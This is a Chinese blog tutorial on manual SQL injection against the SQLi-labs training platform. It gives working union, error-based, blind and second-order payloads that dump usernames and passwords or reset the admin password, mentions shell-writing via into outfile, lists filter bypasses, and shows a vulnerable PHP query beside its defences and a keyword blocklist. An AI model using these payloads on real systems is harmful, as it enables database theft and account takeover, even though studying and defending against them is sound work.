MySQL手工注入學習
SQLi-labs 手工注入學習
以下是通過SLQi-labs平臺的部分簡單例題的手工注入程序
Less-1:union聯合查詢注入
頁面提示:Please input the ID as parameter with numeric value
我們首先構造id引數值:
http://192.168.2.198/sqli-labs-master/Less-1/?id=1' or 1=1--+
確定存在注入點,并猜測SQL陳述句為:
select [欄位] from [表] where [id]="$id";
猜解列數:
因為UNION聯合陳述句函式的格式要求,UNION后的聯合陳述句的回顯欄位數要和UNION前的回顯列數一致……
order by *
union select 1,2,……
爆表:
注意:id的value我們需要給一個不存在結果的value
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
group_concat(): 將group by產生的同一個分組中的值連接起來,回傳一個字串結果
上段~將資料庫中的所有表名拼接成一個字串回傳
爆欄位:
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' --+
爆資料:
union select 1,group_concat(id,0x7e,email_id),3 from emails --+
Less-1:報錯注入
爆表:
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))=1 --+
extractvalue(XML,XPath)從目標XML中回傳包含查詢值得字串
引數XML:String格式,為XML檔案物件得名稱
引數XPath:xpath格式得字串
因為我們在xpath輸入的不是要求的xpath格式的字串,所以函式會報錯回傳xpath引數內容
xpath會被帶入mysql進行執行操作,發現不是xpath格式,但是只有在執行后才會發現,就會執行concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())sql代碼,查詢內容并且concat拼接字串,隨后由extractvalue函式回傳報錯~
爆欄位:
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))=1 --+
爆資料:
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)))=1 --+
從回傳的結果發現問題,沒有顯示全部的欄位資訊;可以利用篩選過濾條件來
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users where username not in ('Dumb','Angelina'))))=1 --+
利用條件where約束來過濾掉我們已知的欄位資訊,于是mysql在執行的時候就會越過Dumb和Angelina資訊,顯示后面的資訊……以此類推!我們就可以通過不斷的條件繞過回顯的模式來獲取所有內容!在很多情況下我們發現無法完全回顯內容,都可以利用這個方法來繞過已知欄位資訊
Less-2
通過判斷注入點的陳述句,判斷注入點為數字型注入點:
?id=1 and 1=1 --+ #判斷數字型注入點
?id=1' and 1=1 --+ #判斷字符型注入點
union聯合注入爆表:
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
報錯注入報表:
?id=0 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
Less2的具體攻擊方法和Less1一樣,不同的是Less2是數字型注入,不需要單引號閉合
Less-3
判斷注入點
從報錯資訊顯示,我們的id—value寫在SQL陳述句的括號中,換言之就是,這條SQL陳述句缺少一個右括號~
確定注入點和方法策略后按照Less1/2的方法UNION/報錯注入方法
Less-4
判斷注入點
?id=1
?id=1'
?id=1')
?id=1" # 報錯…… ^
我們的ID值會放在SQL陳述句中,且被("$id")包圍
?id=1") --+
手工盲注
按照這回顯,可以認為這是一處盲注……
SQL盲注點 ~~ UNION聯合(回顯)查詢的方法就不可以了……
基于布爾的盲注
?id=1' and left(version(),1)='5' --+
left():從左截取a結果的1個長度的字符
只有當and后面的sql陳述句為True才不會報錯~……
通過猜解的方式,利用left的方法猜解資料庫的版本資訊第一個字符(環境是Mysql 5.1,所以版本資訊第一個字符是‘5’)由此推演,我們可以利用布爾的判斷特性來猜解資料庫名……
如上~ 如果我們不斷的對目標進行猜解,就可以得到資料庫名的第一個字符,以此類推第二個字符……第N個字符;資料庫名的長度也可以通過length(database())>=*進行猜解
牢記布爾盲注的特點:只有當and后面的sql陳述句為True才不會報錯;報錯就表示and后的sql陳述句不成立……開動腦筋就可以創造奇跡
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 #
ascii(substr((select database()),1,1))=98
substr(a,b,c) 將a結果從b開始截取c長度字符,ascii()將字符轉為ascii值
基于報錯的盲注
XPath報錯注入:
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0x7e) --+
基于時間的盲注
主要思路就是利用時間延遲來判斷布爾條件是否達成,本質上是利用時間延遲來進行布爾和報錯盲注的判斷依據條件;用于沒有任何回顯資訊的時候使用~
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷陳述句, 條件為假,
?id=1' and if(ascii(substr(database(),1,1))=96,1,sleep(10)) --+
ascii()負責猜解;if()負責判斷,若是猜解成立則回傳1,若是猜解不成立延遲10秒
從報錯結果中,看出注釋符應該被禁了……而且從報錯結果認定布爾和報錯注入是不可舉的!!!
于者乎……時間盲注是最優選擇~~~
當然了……還有在這里說一說檔案的匯入于匯出的方法:
Less-24 二次排序
*- 借鑒sqli-labs-24
分析環境檔案:
login.php:查詢資料庫用戶存在和驗證登錄
login.php中使用了mysql_real_escape_string()函式對用戶輸入的字串進行處理;會將特殊字符進行轉義使之失去效果;但是~之后資料存盤進資料庫后轉義的字符會恢復原樣!
- 黑客通過構造資料的形式, 在瀏覽器或者其他軟體中提交 HTTP 資料報文請求到服務
端進行處理, 提交的資料報文請求中可能包含了黑客構造的 SQL 陳述句或者命令, - 服務端應用程式會將黑客提交的資料資訊進行存盤, 通常是保存在資料庫中, 保存的
資料資訊的主要作用是為應用程式執行其他功能提供原始輸入資料并對客戶端請求做出響
應, - 黑客向服務端發送第二個與第一次不相同的請求資料資訊,
- 服務端接收到黑客提交的第二個請求資訊后, 為了處理該請求, 服務端會查詢資料中已經存盤的資料資訊并處理, 從而導致黑客在第一次請求中構造的 SQL 陳述句或者命令在服務端環境中執行,
- 服務端回傳執行的處理結果資料資訊, 黑客可以通過回傳的結果資料資訊判斷二次注
入漏洞利用是否成功,
在login_create.php注冊頁面中,使用了mysql_real_escape_string()但是資料還是會被存放在資料庫中……
資料會被完整的記錄在資料庫中
資料庫中有了我們的“小玩意”之后……
登錄我們的賬戶,因為我們的賬戶是以admin'#保存的,固然要這樣的去訪問和登錄
前端提交user和pass后,會在修改密碼頁面修改密碼
就這樣我們成功的修改了admin的密碼!為啥呢?
Sql 陳述句變為 UPDATE users SET passwd=”New_Pass” WHERE username =’ admin’ # ‘ AND password=’
也 就 是 執 行 了 UPDATE users SET passwd=”New_Pass” WHERE sername =’admin’
利用注冊的admin’# 修改密碼時候從資料庫提取該資料 造成了資料 命令拼接
注入漏洞可以做哪些?
SQL注入可以做什么?如果從一個普通人的角度看,第一想起的就是“萬能密碼”即通過構造SQL注入陳述句繞過密碼驗證,
-
獲取資料庫資訊
發現SQL注入點后,通過猜解的方式獲取當前資料庫的庫結構、表結構、欄位內容,并通過Payload獲取服務器的物理路徑資訊、用戶資訊、敏感資料資訊等,如果成功的獲得了資料庫或服務器的高權限就可以“拖庫”,
-
寫入Shell
通過SQL注入漏洞執行寫檔案操作(寫入Shell),例如:
loadfile()into outfile等函式都可以實作讀寫本地檔案,當然讀寫檔案的先決條件:檔案的讀寫權限、檔案為可讀屬性、了解檔案的物理路徑等,
SQL注入防御策略
本文的SQL注入防御將會基于“常見SQL注入環境搭建(by:Mirror王宇陽)”中的搭建的環境做出防御措施,
過濾敏感字符
將常用的SQL注入字符寫入到黑名單中,然后通程序式對用戶提交的POST、GET請求以及請求中的各個欄位都進行過濾檢查,篩選威脅字符,
# 部分敏感字符和字串
delete from|from|count\(|drop table|update|truncate|mid\(|char\(|xp_cmdshell|exec master|netlocalgroup administrators|net user|[\{|\}|!|\']
# 前端處理
var str = "select * from table where id=123";
var reg = /(.*?((select)|(from)|(count)|(delete)|(update)|(drop)|(truncate)).*?){2,}/i;
return(reg.test(str));
在字符過濾方面,通常過濾空格、括號、引號……等特殊字符,但是這些可以繞過的:
舉例:過濾空格 select/**/name/**/from/**/user/**/where/**/id='kk' 或 select(name)from(user)where(id='kk')通過這種方法就會規避對空格的過濾;過濾括號和引號select name from user wehere id=0x6b6b0x6b6b(kk的十六進制)
限制查詢長度
由于SQL注入程序中需要構造較長的SQL陳述句,因此,一些特定的程式可以使用限制用戶提交的請求內容的長度來達到防御SQL注入的目的,但這種效果并不好,
// 接收引數text
if(isset($_GET['text']) && strlen($_GET['text']) < 10){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
設定資料庫權限
根據程式要求為特定的表設定特定的權限,如:某段程式對某表只需具備select權限即可,這樣即使程式存在問題,惡意用戶也無法對表進行update或insert等寫入操作,
限制目錄權限
WEB目錄應至少遵循“可寫目錄不可執行,可執行目錄不可寫”的原則,在次基礎上,對各目錄進行必要的權限細化,
限制資料型別
因為PHP語言沒有嚴格的限制資料型別的定義例如:“ID=1 就默認ID為Intger ; name=kk 默認name為string”在PHP的弱型別管理中這是不安全的,
舉例:
// 接收引數text
if(isset($_GET['text'])){
$text=$_GET['text'];
}
// 拼接sql陳述句并執行
$sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1";
echo 'SQL拼接結果:'.$sql;
echo '<hr>';
// 執行sql陳述句并回傳結果
$result=mysqli_query($conn, $sql);
這里的text引數沒有限制我們的輸入,理論上我們的輸入應該限制為“Intger”;當text接到' union select 1,database(),version(),4; -- +引數后就會自動推導text為“String”型別并拼接為SQL陳述句,
這里可以使用is_numeric() \ ctype_digit()函式判斷資料型別
is_numeric():檢測變數是否為數字或數字字串;指定的變數是數字和數字字串則回傳 TRUE,否則回傳 FALSE,
if(isset($_GET['text']) && is_numeric($_GET['text'])){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
ctype_digit():純數字檢測;對指定的變數檢測判斷是否為連續且純數字的字串(字串離全為數字),
if(isset($_GET['text']) && ctype_digit($_GET['text'])){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
缺陷:
這里只可以有效的預防數字型的注入點,而String型別的注入點此方法則無效,
限制特殊字符
在字符型注入點,任何惡意的SQL攻擊都會包含一些特殊的字符,例如空格、括號、引號……等,如果存在敏感的特殊字符,需要使用字符轉義,
使用轉義字符函式,防止SQL注入
- 過濾特殊字符函式:
function safe_replace($string)
{
$string = str_replace('%20', '', $string);
$string = str_replace('%27', '', $string);
$string = str_replace('%2527', '', $string);
$string = str_replace('*', '', $string);
$string = str_replace('"', '"', $string);
$string = str_replace("'", '', $string);
$string = str_replace('"', '', $string);
$string = str_replace(';', '', $string);
$string = str_replace('<', '<', $string);
$string = str_replace('>', '>', $string);
$string = str_replace("{", '', $string);
$string = str_replace('}', '', $string);
…… …… …… ……
return $string;
}
- mysql_real_escape_string()函式:
對一些例如單引號、雙引號、反斜杠等特殊字符添加一個反斜杠以確保在查詢這些資料之前,用戶提供的輸入是干凈的,但要注意,你是在連接資料庫的前提下使用這個函式,
- addslashes()
這個函式的原理跟mysql_real_escape_string()相似,但是當在php.ini檔案中,“magic_quotes_gpc“的值是“on”的時候,就不要使用這個函式,magic_quotes_gpc 的默認值是on,對所有的 GET、POST 和 COOKIE 資料自動運行 addslashes(),不要對已經被 magic_quotes_gpc 轉義過的字串使用 addslashes(),因為這樣會導致雙層轉義,你可以使用get_magic_quotes_gpc()函式來確定它是否開啟,
- htmlentities()
這個函式對于過濾用戶輸入的資料非常有用,它會將一些特殊字符轉換為HTML物體,例如,用戶輸入<時,就會被該函式轉化為HTML物體<(<),輸入>就被轉為物體>.(HTML物體對照表:http://www.w3school.com.cn/html/html_entities.asp),可以防止XSS和SQL注入攻擊,
- htmlspecialchars()
在HTML中,一些特定字符有特殊的含義,如果要保持字符原來的含義,就應該轉換為HTML物體,這個函式會回傳轉換后的字串,例如‘&’ (ampersand) 轉為’&‘(ps:請參照第三點中的物體對照表鏈接)
- strip_tags()
這個函式可以去除字串中所有的HTML,JavaScript和PHP標簽,當然你也可以通過設定該函式的第二個引數,讓一些特定的標簽出現,
筆者在學習SQL注入期間了解的注入防御策略很少,可能也是實踐的操作還是太少、代碼基礎仍有欠缺……By:Mirror王宇陽
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5389.html
標籤:訊息安全
上一篇:避免XSS攻擊